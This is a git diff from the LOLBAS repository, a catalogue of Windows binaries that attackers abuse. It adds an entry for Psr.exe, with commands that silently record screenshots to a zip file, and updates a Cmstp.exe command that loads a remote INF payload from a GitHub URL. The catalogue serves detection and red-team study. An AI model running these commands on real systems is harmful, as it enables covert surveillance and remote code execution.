Merge branch 'master' of https://github.com/api0cradle/LOLBAS
commit
103f02959e
|
@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you.
|
|||
|
||||
## Binary.exe
|
||||
|
||||
* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials
|
||||
* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials, Surveillance
|
||||
|
||||
```
|
||||
Example
|
||||
|
|
|
@ -37,6 +37,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Powershell.exe](OSBinaries/Powershell.md)
|
||||
[Presentationhost.exe](OSBinaries/Presentationhost.md)
|
||||
[Print.exe](OSBinaries/Print.md)
|
||||
[Psr.exe](OSBinaries/Psr.md)
|
||||
[Qprocess.exe](OSBinaries/Qprocess.md)
|
||||
[Reg.exe](OSBinaries/Reg.md)
|
||||
[Regedit.exe](OSBinaries/Regedit.md)
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
```
|
||||
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
|
||||
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf
|
||||
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
|
@ -13,8 +13,8 @@ Acknowledgements:
|
|||
* Nick Tyrer - @NickTyrer
|
||||
|
||||
Code sample:
|
||||
* [Cmstp.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf)
|
||||
* [Cmstp_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp_calc.sct)
|
||||
* [Cmstp.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf)
|
||||
* [Cmstp_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct)
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/NickTyrer/status/958450014111633408
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
## Psr.exe
|
||||
|
||||
* Functions: Surveillance
|
||||
|
||||
```
|
||||
psr.exe /start /gui 0 /output c:\users\user\out.zip
|
||||
|
||||
psr.exe /stop
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
*
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\Psr.exe
|
||||
C:\Windows\SysWOW64\Psr.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
It does not log keystrokes. Only screenshots when something is clicked.
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue